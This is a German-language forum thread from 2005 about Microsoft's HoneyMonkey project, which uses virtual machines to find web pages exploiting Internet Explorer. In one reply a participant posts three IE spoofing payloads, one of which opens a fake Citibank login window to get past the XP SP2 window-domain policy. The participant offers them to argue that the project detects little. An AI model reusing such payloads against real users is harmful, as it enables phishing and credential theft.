[swissboy]

Erste Erfolge der Microsoft Web-Patrouille

Zitat

Microsoft hat erstmals einen Erfolgsbericht seines Projekts "Honeymonkeys" veröffentlicht. Rechner, die mit unterschiedlichen Update-Ständen von Windows XP ausgestattet sind, durchsuchen täglich das Web nach neuen Gefahren. Microsoft berichtet nun, dass die Sicherheitslücke in der javaprxy.dll (MS05-037) bereits Anfang Juli ausgenutzt und dies durch die "Honeymonkeys" entdeckt wurde.

Im ersten Monat des im Mai gestarteten Projekts fanden die automatisch das Web absuchenden Rechner über 750 Web-Seiten auf knapp 300 verschiedenen Websites, die bekannte Sicherheitslücken in Windows, einschliesslich Internet Explorer, auszunutzen versuchten. Mit dem so genannten "Strider Flight Data Recorder" werden die Änderungen festgestellt, die durch den schädlichen Code an der Registry und am Dateisystem vorgenommen werden. Das Kontrollsystem beendet dann die virtuelle Maschine, in der die anfällige Windows-Version läuft und startet sie neu. Eine andere virtuelle Maschine mit neuerem Update-Stand besucht dann die zuvor gefundene Seite. Mit einer solchen Kette wird überprüft, wie gefährlich der Exploit ist.

Anfang Juli entdeckten Microsofts Honeymonkeys dann erstmals Seiten, die eine Sicherheitslücke auszunutzen versuchten, für die zu diesem Zeitpunkt noch kein Patch verfügbar war. Dabei handelt es sich um einen Fehler in der Datei javaprxy.dll, über den ein Trojanisches Pferd eingeschleust werden kann ( wir berichteten ). In den folgenden zwei Wochen beobachtete Microsoft, dass bis zu 40 der regelmäßig überwachten Web-Seiten diesen Exploit übernahmen. Dahinter steckten nur drei Websites als Quelle, wie sich herausstellte.

Aus diesen Ergebnissen leitet Microsoft die Erkenntnis ab, dass die Betreiber der Exploit-Websites ihre Seiten sehr schnell aktualisieren, das heißt sie bauen so schnell wie möglich neue Exploits ein. So nutzen sie auch so genannte "0-Day-Exploits", nutzen also neu entdeckte Schwachstellen, gegen die es noch keine Updates gibt. Den Zwischenbericht über das Honeymonkey-Projekt hat Microsoft als zwölfseitige PDF-Datei in englischer Sprache veröffentlicht.

Quelle PC-Welt

[swissboy]

Microsoft sucht Exploits für Internet Explorer

Zitat

"Wer sich in Gefahr begibt, kommt darin um", heißt es im Volksmund. Microsofts Sicherheitsforscher hingegen wollen auf genau diesem Weg die Sicherheit im Internet erhöhen. Sie suchen gezielt nach Webseiten, die über Lücken im Internet Explorer ein Windows-System befallen, um sich so einen besseren Überblick über derzeit kursierende Exploits und Bedrohungen für Windows-Systeme im Internet zu verschaffen. Unter Umständen lassen sich so sogar Zero-Day-Exploits ausfindig machen, also Angriffe auf Lücken, die noch gar nicht öffentlich bekannt sind und für die noch gar kein Patch verfügbar ist. 

Eigens dafür hat man das Projekt HoneyMonkey ins Leben gerufen. Anders als etwa bei Honeypots wartet der Betreiber nicht darauf, bis ein Angreifer einen Einbruchsversuch startet. Stattdessen surfen mehrere Windows-XP-Clients automatisiert durchs Netz und warten beim Aufruf einer Seite auf einen Angriff. Um die Wahrscheinlichkeit zu erhöhen, füttert man die Rechner mit URLs, die bereits in der Vergangenheit unangenehm aufgefallen sind oder etwa in manipulierten Hosts-Dateien gefunden wurden.

Um die Bedrohungen besser unterscheiden und einschätzen zu können, arbeiten die Redmonder mit Windows-XP-Systemen auf verschiedenen Patch-Ständen: Wurde ein XP mit SP1 ohne Patches infiziert, besucht anschließend ein XP mit SP2 ohne Patches, ein XP mit SP2, das teilweise gepatcht ist, und ein XP SP2 mit allen Sicherheitsupdates die Seite. Die Auswertung, ob ein System infiziert wurde, erfolgt ebenfalls automatisch. Dazu registriert ein Programm namens Strider Flight Data Recorder unter anderem alle Änderungen in der Registry und an Systemdateien. Zusätzlich kontrollieren Microsofts hauseigene Tools Strider Ghostbuster und Strider Gatekeeper das System auf eine Infektion mit Rootkits oder Spyware. Nach jedem Besuch wird das in einer virtuellen Umgebung laufende Strider Honeymonkey Exploit Detection System neu und schädlingsfrei gestartet.

In den ersten Monaten zählte Microsoft insgesamt 752 Webseiten, die in der Lage waren, einen PC ohne Nutzerinteraktion zu infizieren. Die Webseiten beziehungsweise URLs ließen sich auf nur 287 Server zurückführen. 688 der Exploits funktionierten nur auf ungepatchten XP-SP1-Systemen, immerhin 204 auf nicht aktualisierten XP-SP2-Clients. Nur 17 konnten teilweise gepatchte XP-SP2-PCs befallen. Ein Windows XP mit SP2 und allen Updates wurde im Testzeitraum Mai/Juni 2005 kein einziges Mal befallen.

Stolz weist Microsoft in seiner zwölfseitigen Auswertung des Experiments auch darauf hin, kurz nach Ende der ersten Auswertung einen Zero-Day-Exploit auf einer Webseite entdeckt zu haben, durch den auch vollständig gepatchte XP-SP2-Systeme gefährdet waren. Ein Bug beim Aufruf des COM-Objekts javaprx.dll ermöglichte die vollständige Kontrolle über den Rechner. Ob dieser Erfolg der frühzeitigen Entdeckung wirklich Honeymonkey zuzurechnen ist, ist fraglich. Immerhin hatten die Sicherheitsspezialisten von SEC Consult den Softwarekonzern bereits Mitte Juni über den Fehler informiert. Dort glaubte man aber zunächst nicht an die Ausnutzbarkeit der Lücke, bis SEC Consult sein Advisory veröffentlichte und wenig später die erste Webseite Anwendern Schadcode über das Loch unterjubelte. Kurz darauf gab Microsoft einen Patch zum Schließen der Lücke heraus. Innerhalb von zwei Wochen übernahmen 40 weitere Webseiten den Exploit.

Der diese Woche veröffentlichte Patch für den Internet Explorer deaktiviert 40 weitere COM-Objekte, die sich auf ähnliche Weise ausnutzen lassen. Für mindestens eins ist bereits ein Exploit veröffentlicht worden. Es dürfte nicht lange dauern, bis Microsofts HoneyMonkey die ersten Webseiten entdeckt, die diese Schwachstelle ausnutzen, um IE-Nutzern, die den Patch noch nicht eingespielt haben, Trojaner oder Spyware unterzujubeln.

Quelle heise online

[Rika]

Wäre es nicht einfacher, einen einzelnen Mitarbeiter die Suchfunktion auf Securityfocus benutzen zu lassen und damit mal einige der Exploits für das vollpatchte XPSP2 zu begutachten? Zählen die nicht eigentlich auch unter 0-Day, weil ewig nicht gefixt, aber trotzdem kaum begutachtet und daher selten genutzt? Muss man denn erst eine Betrügerei im großen Stil laufen lassen, damit so etwas Beachtung findet?

Und was wird eigentlich aus XPSP1+alles, 2KSP4+alles oder 2KSP2+alles? Ich denke, die genießen auch noch Support und sind häufig anzutreffen.

Dieser Beitrag wurde von Rika bearbeitet: 12. August 2005 - 00:00

[swissboy]

Zitat (Rika: 12.08.2005, 00:59)

Und was wird eigentlich aus XPSP1+alles, 2KSP4+alles oder 2KSP2+alles? Ich denke, die genießen auch noch Support und sind häufig anzutreffen.<{POST_SNAPBACK}>

Für die gab es ja die gleichen Internet Explorer Updates, z.B MS05-038 und MS05-037.

[Rika]

Das ändert nix daran, daß die IE-Versionen verschieden bleiben. Z.B. interessiert sich Win2K arg wenig für die Umgehung der Window-Domain-Policy[1], die bei IE6SP2 eingeführt wurde, ist aber wiederum auch trivial anfällig für beliebiges DrawContext-Spoofing[2] oder URL-Spoofing[3] (und damit in jedem Sicherheitskontext unbrauchbar). (Mal ganz davon abgesehen, daß URL-Spoofing unter IE6SP2 ja auch noch geht)

[1]

function shellscript()
{
  window.focus();
  pURL = 'http://securelogin.citibank.com"+".e-gold.com/';
  sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,
';
  sP += 'menubar=0,resizable=0,width=315,';
  sP += 'height=200,left = 250,top = 200'
  day = new Date();
  id = day.getTime();
  eval("page" + id + " = window.open(pURL, '" + id + "',sP);");
}

function main()
{
  targetURL = 'http://citibank.com/us/index.htm';
  x.DOM.Script.execScript(shellscript.toString());
  x.DOM.Script.setTimeout("shellscript()");
  location.replace(targetURL);
}

setTimeout(' main() ',1000);

// End -->
</script>

</head>

<object
	id="x"
	classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
	width="1"
	height="1"
	align="middle"
>
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>

Man schaue auf die Titelleiste - XPSP2 schreibt vor, daß bei Fenster ohne Adressleiste stets der Domain-Name dem tatsächlcihen Titel vorangestellt wird.

[2]

window.resizeTo(screen.width,screen.height);
window.moveTo(0,0);

op=window.createPopup();

s='<body><img src="14.gif"></body>';

op.document.body.innerHTML=s;

dx=100;
dy=100;

function opmov()
{

if (dx != 0) dx-=10;
if (dy != 0) dy-=10;

if(op.isOpen)
 op.hide();
op.show(51+dx,-22+dy,644,18,document.body);

}
function start()
{
 in1=setInterval("{opmov();}",150);
}
</script>
<img src='14.gif' style='visibility: hidden'>

[3]

<body onload="setTimeout('   main()   ',1000)">
<object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" align="middle" height="1" width="1">
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>
<script>
function shellscript() {
  open("http://www.yahoo.com","_blank","scrollbar=no");
  showModalDialog("http://www.yahoo.com");
}

function main() {
  x.DOM.Script.execScript(shellscript.toString());
  x.DOM.Script.setTimeout("shellscript()");
}
</script>

Im übrigen kann man solche Exploits nicht mit den benannten Methoden erkennen, führen aber auch trivial zu jedem beliebigen Verhalten des Benutzers.

[swissboy]

@Rika:

Lassen wir's dabei bewenden, wir werden und eh nicht einig.
Der IE ist und bleibt nun mal dein Lieblings-Target.

[shogun03]

@rika

das ist zwar toll wenn du uns immer erzählst was (angeblich) alles geht aber die praxis im internet scheint von deinen theorien irgendwie garnichts zu halten wenn ich z.b. lese das ein voll gepatchtes windows von keiner der 750 malwareseiten infiziert werden konnte.
vielleicht solltest du "deine" 80 sicherheitslücken im windows dochmal öffentlich machen , damit die cracker und scriptkiddies und anderen banden endlich mal was richtiges lernen

[Rika]

Ähm... es geht vielmehr und die Wirksamkeit der Beurteilung der hier vorgestellten Methode für Webbrowser - und die ist leider nicht sonderlich groß, weil das Verfahren bei einer eherblichen Mehrzahl der Fälle nicht anschlägt. Entweder war das denen nicht vorher klar oder es handelt sich nur um ein Experiment, dann aber mit sehr geringer ingeneurswissenschaftlicher Relevanz.

(Mal ganz davon abgesehen besteht unsere scheinbare Meinungsverschiedenheit nur darin, daß du nicht einsehen willst, daß es absolut inakzeptabel ist, daß eine Firma mit solchen finanziellen Resourcen es nicht mal gebacken kriegt, sich wirklich um die Kunden zu kümmern und dieses Frickelding wieder ordentlich hinzufrickeln, oder es einfach sein lassen und offen zugeben, daß es nur Frickelei ist.)

[swissboy]

Zitat (Rika: 12.08.2005, 01:54)

Entweder war das denen nicht vorher klar oder es handelt sich nur um ein Experiment, dann aber mit sehr geringer ingeneurswissenschaftlicher Relevanz.<{POST_SNAPBACK}>

Manchmal könnte man schon meinen das nur du alleine die Weisheit gepachtet hast.
Meinst du Microsoft macht so etwas nur so zum Spass und hat keine Mitarbeiter die mindestens soviel Fachwissen wie du haben?

Dieser Beitrag wurde von swissboy bearbeitet: 12. August 2005 - 01:00

[Rika]

Zitat

Meinst du Microsoft macht so etwas nur so zum Spass

Welche Relevanz hat die Portierung von PowerPoint XP auf .NET, außer als Proof-of-Concept zu gelten?

Zitat

und hat keine Mitarbeiter die mindestens soviel Fachwissen wie du haben?

Ähm, sorry, aber ein Webbrowser ist viel zu komplex, um durch einen Honeynet-Ansatz sinnvoll geprüft zu werden. Ich glaube kaum, daß dieses Projekt zu mehr als 1. der Einschätzung führt, daß es praktisch nicht sonderlich brauchbar ist, um neue Fehler zu finden 2. Publicity dienen soll.

Dieser Beitrag wurde von Rika bearbeitet: 12. August 2005 - 01:15

[shogun03]

@rika

kennst du das testverfahren , warst du bei der installation mit dabei?
ich hatte es schon fast geahnt das du doch der meinung bist das diese onlinetests nurso zum spass gemacht werden damit man hinterher wieder mit gefälschten statistiken gegen das andere OS argumentieren kann.

Dieser Beitrag wurde von shogun03 bearbeitet: 12. August 2005 - 01:19